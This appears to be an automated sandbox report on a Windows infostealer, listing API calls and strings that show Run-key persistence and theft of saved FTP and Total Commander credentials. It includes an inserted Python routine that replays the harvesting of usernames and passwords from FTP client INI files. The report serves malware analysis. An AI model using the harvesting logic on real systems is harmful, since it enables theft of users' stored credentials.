                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779
                  APIs
                  • GetCommandLineW.KERNEL32 ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820), ref: 0040AB44
                  • CharLowerW.USER32(?), ref: 0040AB57
                  • CharLowerW.USER32(?), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: b2ecad4675651e133223641967df2b0444bb0b5a8c67c8da0a44246ab1e465c2
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: b2ecad4675651e133223641967df2b0444bb0b5a8c67c8da0a44246ab1e465c2
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                  • RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID: w,@
                  • API String ID: 3356406503-3776089593
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040781B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5
                  APIs
                  • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Internet$AttemptConnectOpen
                  • String ID:
                  • API String ID: 2984283330-0
                  • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                  • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: PrivateProfileString$AllocateHeap
                  • String ID: connections$default$ftp://%s:%s@%s$host$password$username
                  • API String ID: 1411386233-3902919163
                  • Opcode ID: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                  • Opcode Fuzzy Hash: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                  APIs
                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?), ref: 00406A8C
                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?), ref: 00403309
                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?), ref: 00403333
                  • SetUnhandledExceptionFilter.KERNEL32(004032AF), ref: 0040333A
                  • LoadLibraryW.KERNEL32(atl), ref: 00403345
                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                  • API String ID: 3066332896-2664446222
                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403566
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                  • RtlAllocateHeap.NTDLL(00000008,00000C20), ref: 004035B5
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403681
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: PrivateProfile$String$AllocateHeap$CombinePath
                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                  • API String ID: 3333933401-2696999094
                  • Opcode ID: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                  • Opcode Fuzzy Hash: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
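The two INI-walking records above (the first reading `connections`, `default`, `host`, `username` and `password` and formatting `ftp://%s:%s@%s`; the second reading `user`, `pass` and `port`, with GetPrivateProfileIntW defaulting the port to 0x15 = 21, and formatting `ftp://%s:%s@%s:%u`) can be replayed to see exactly what the sample assembles from an FTP client's saved-connection INI, which is what a responder needs when deciding which credentials to rotate. The following is an added example and not the sample's code or any FTP client's code: it models GetPrivateProfileStringW's NULL-section / NULL-key enumeration semantics in pure Python and runs it over a constructed INI whose layout (a `[connections]` list section whose keys name one section per saved connection) is an assumption drawn from the strings in the records; real clients differ in section and key names. The trace does not show how the `default` entry or the two StrStrIW checks are used, so they are not modelled.

```python
def profile_string(ini_text, section=None, key=None, default=""):
    """Minimal GetPrivateProfileStringW over an in-memory INI: section None
    returns all section names, key None returns all key names of the
    section, otherwise the key's value (or `default` if absent). Lists stand
    in for the NUL-separated buffer the Win32 call fills. Names are
    case-insensitive, as in the Win32 API."""
    sections = {}            # lower-name -> (name, {lower-key: (key, value)})
    current = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1].strip()
            current = sections.setdefault(name.lower(), (name, {}))
        elif "=" in line and current is not None:
            k, _, v = line.partition("=")
            current[1][k.strip().lower()] = (k.strip(), v.strip())
    if section is None:
        return [name for name, _ in sections.values()]
    sec = sections.get(section.lower())
    if sec is None:
        return [] if key is None else default
    if key is None:
        return [k for k, _ in sec[1].values()]
    return sec[1].get(key.lower(), (None, default))[1]


def profile_int(ini_text, section, key, default):
    """GetPrivateProfileIntW: the key's value as an integer, else `default`."""
    try:
        return int(profile_string(ini_text, section, key, None))
    except (TypeError, ValueError):
        return default


def harvest_ftp_ini(ini_text, list_section="connections", host_key="host",
                    user_key="username", pass_key="password", port_key=None):
    """Replay the walk seen in the two records: enumerate the entries of the
    connection-list section, read each entry's own section for the
    credential keys, and render the URL form the sample formats. With
    port_key set the ftp://%s:%s@%s:%u form is used and a missing port
    falls back to 21 (0x15), as the GetPrivateProfileIntW call does."""
    urls = []
    for name in profile_string(ini_text, list_section, None):
        host = profile_string(ini_text, name, host_key)
        if not host:                       # list entry without its own section
            continue
        user = profile_string(ini_text, name, user_key)
        pwd = profile_string(ini_text, name, pass_key)
        if port_key is None:
            urls.append("ftp://%s:%s@%s" % (user, pwd, host))
        else:
            port = profile_int(ini_text, name, port_key, 21)
            urls.append("ftp://%s:%s@%s:%u" % (user, pwd, host, port))
    return urls


# Constructed INI in the assumed layout: a [connections] list whose keys name
# one section per saved connection. Values are placeholders, not real data.
SAMPLE_INI = """\
[connections]
work=work
backup=backup
stale=stale

[default]
pasvmode=1

[work]
host=ftp.example.test
username=alice
password=s3cr3t

[backup]
host=backup.example.test
username=bob
password=hunter2
port=2121
"""

if __name__ == "__main__":
    for url in harvest_ftp_ini(SAMPLE_INI):
        print(url)
    for url in harvest_ftp_ini(SAMPLE_INI, port_key="port"):
        print(url)
```

The point to take from the replay is that whatever the client wrote into the INI, encoded or not, is copied verbatim into the `ftp://user:pass@host` string; a client-side password obfuscation scheme does not change what leaves the host, only what the operator has to undo.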
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • FindFirstFileW.KERNEL32(?,?), ref: 00408280
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                  • Sleep.KERNEL32(00000000), ref: 00408342
                  • Sleep.KERNEL32(00000000), ref: 00408377
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                  • FindClose.KERNEL32(00000000), ref: 004083B9
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                  • String ID: 5@$5@$.$.
                  • API String ID: 2348139788-1020649804
                  • Opcode ID: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                  • Opcode Fuzzy Hash: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: c447aa35336725f8732cf0730d8f7f5f0cade8854a5a040e2a03077eb38439fa
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: c447aa35336725f8732cf0730d8f7f5f0cade8854a5a040e2a03077eb38439fa
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Heap$AllocateEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                  • API String ID: 1603279786-3914982127
                  • Opcode ID: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                  • Opcode Fuzzy Hash: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                  APIs
                  • OleInitialize.OLE32(00000000), ref: 004027F5
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Internet$InitializeOpenOption
                  • String ID: From: true
                  • API String ID: 1176259655-9585188
                  • Opcode ID: 36ad01a7f3a6d2ce224a0f3363f0d94e822c0e02de412e7abea947b50f426571
                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                  • Opcode Fuzzy Hash: 36ad01a7f3a6d2ce224a0f3363f0d94e822c0e02de412e7abea947b50f426571
                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                  APIs
                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                  • GetLastError.KERNEL32(?), ref: 00402F4E
                  • GetLastError.KERNEL32 ref: 00403237
                  • GetLastError.KERNEL32(?), ref: 00403258
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                  • String ID: .html$From: $Via: $^client=$^key=$file$none
                  • API String ID: 2247176544-3749385445
                  • Opcode ID: 5aad60fe16bdaf4296323caa5e87f39f8fc6d0746fd052f0818feb4d28a1d407
                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                  • Opcode Fuzzy Hash: 5aad60fe16bdaf4296323caa5e87f39f8fc6d0746fd052f0818feb4d28a1d407
                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 004041FD
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Memory Dump Source
